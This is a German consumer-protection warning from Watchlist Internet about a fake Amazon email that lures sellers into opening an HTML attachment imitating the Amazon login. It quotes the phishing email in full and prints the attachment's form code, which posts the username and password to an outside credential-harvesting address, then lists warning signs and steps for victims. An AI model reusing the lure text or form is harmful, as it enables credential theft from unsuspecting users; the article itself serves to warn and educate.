Zum Seiteninhalt
News

Amazon-Phishingmail: Rechnung über Ihre Verkäufergebühren

Gepostet am 27.03.2017 von Watchlist Internet

In einer angeblichen Nachricht von „Europe Amazon“ erhalten Kund/innen die Information, dass ihr „Duplikat der elektronisch erzeugten Steuerrechnung“ verfügbar sei. Sie können es in einem beigefügten Dokument, das den Login-Bereich von Amazon imitiert, herunterladen. Es handelt sich um einen Phishingversuch.

Mit einer gefälschten Amazon-Nachricht versuchen Kriminelle, die Zugangsdaten von Kund/innen zu stehlen. Damit sie das Ziel erreichen, behaupten sie, dass die „elektronisch erzeugten (sic!) Steuerrechnung“ als „Email-Dokument (sic!)“ verfügbar sei. Die Steuerrechnung könne angeblich nur durch Bekanntgabe der Zugangsdaten in einem beigefügten html-Dokument eingesehen werden. Wortwörtlich heißt es in der E-Mail dazu:

Absender: Europe Amazon <messages-marketplace@amazon-europe.com>
Betreff: Rechnung uber Ihre Verkaeufergebuehren bei Amazon.de 03/2017 .

Guten Tag,

Wir werden Ihnen ein Duplikat der elektronisch erzeugten Steuerrechnung für den Monat 02/2017 als ein Email-Dokument senden. Bemerken Sie(nehmen Sie zur Kenntnis) bitte, dass das nicht ein Zahlungsantrag(Zahlungswunsch) ist.

Loggen Sie bitte in zu Ihrem Verkaufskonto in Verkäufer Zentral, Sie werden die Form(Formular) für Ihr Konto per Email geschickt oder um Kopien anderer Steuererklärungen zu bitten, bezahlt zu werden.

Wenn Sie weitere Fragen haben, setzen Sie sich bitte mit unserem Verkaufsdienst in Verbindung.

Blicke(Hinsicht)

Freundliche Grusse
Amazon Europe

Dateianhang: Rechnung-mustermailadresse #25.03.2017.html

Bereits grafisch erweckt die gefälschte Amazon-Phishingmail den Eindruck, unseriös zu sein:


Eine gefälschte Amazon-Phishingmail.

Datenübermittlung an Kriminelle

Empfänger/innen, die den Dateianhang der E-Mail öffnen, um ihre angebliche Steuerrechnung zu sehen, sehen ein html-Dokument, das den Loginbereich von Amazon imitiert Ihre E-Mailadresse ist bereits in einem von zwei Formularfeld eingetragen. Kund/innen müssen nur noch ihr Passwort eingeben und die Schaltfläche „Anmelden“ betätigen.


Eine gefälschte Amazon-Phishingmail.

Das Betätigen der Schaltfläche „Anmelden“ führt den Befehl

<form action="verify.amazon-check.us/verify.php" method="post"><br>
<input id="user" name="user" type="text" value="muster@adresse.at"  required/>
<input id="pass" name="pass" type="password" value=""  required/><br />
<input id="submit" name="submit" type="submit" value="" />

aus. Der Befehl führt dazu, dass Kund/innen die im Formular abgefragten Informationen an Kriminelle senden. Dadurch haben diese Zugang auf das fremde Amazon-Konto und können es für Verbrechen nutzen.

Woran erkennen Sie die Phishingmail?

Die vermeintliche Amazon-Nachricht können Sie unter anderem anhand der nachfolgenden Punkte als betrügerisch erkennen:

  • Amazon versendet kein „Duplikat der elektronisch erzeugten Steuerrechnung“. Damit ist die Nachricht inhaltlich falsch.
  • Als Absender der E-Mail scheint „Europe Amazon“ auf, die dazugehörige E-Mailadresse „messages-marketplace@amazon-europe.com“ gehört jedoch nicht dem Unternehmen: Ein Anonymisierungsdienst aus den USA hat die Domain „amazon-europe.com“ registriert.
  • Die E-Mail weist zahlreiche Fehler auf („Bemerken Sie (nehmen Sie zur Kenntnis) bitte“). Echte Amazon-Nachrichten sind lektoriert und fehlerfrei.
  • Das Schreiben spricht Empfänger/innen nicht persönlich an: „Guten Tag“. Unternehmen kennen ihre Kund/innen und benennen diese mit ihrem Namen.
  • Kund/innen sollen in einem manipulierten Dateianhang ihre Amazon-Zugangsdaten bekannt geben und diese an Unbekannte senden. Das ist ein eindeutiger Hinweis darauf, dass es sich um einen Phishingversuch handelt.

Sie haben das Formular ausgefüllt?

Wenn Sie das Formular der Kriminellen ausgefühlt haben, rufen Sie umgehend die offizielle Amazon-Website auf und ändern darauf das Passwort Ihres Benutzerkontos. Ist das nicht mehr möglich, weil sich die Verbrecher/innen bereits Zugriff zu Ihrem Konto verschafft haben, kontaktieren Sie den Amazon-Kundendienst und besprechen mit ihm das weitere Vorgehen zur Schadensabwehr. Rufen Sie Ihr Kreditkarteninstitut an und lassen Sie  Ihre Kreditkarte sperren. Finden Sie auf Ihren Kontoauszügen nicht von Ihnen autorisierte Abbuchungen, beeinspruchen Sie diese bei Ihrer Bank.

Die Watchlist Internet empfiehlt:

Verschieben Sie vermeintliche Amazon-Nachrichten, die Sie auffordern, persönliche Zugangsdaten in einem Dateianhang bekannt zu geben, in Ihren Spam-Ordner. Bei den E-Mails handelt es sich um einen Phishingversuch. Er zielt darauf ab, das Fremde Zugriff auf Ihr Kundenkonto erlangen!

(Die Watchlist Internet bedankt sich bei Leser/innen für die Meldung der Amazomn-Phishingnachricht.)

Unterstützt von:

Ein Projekt des:

Internet Ombudsmann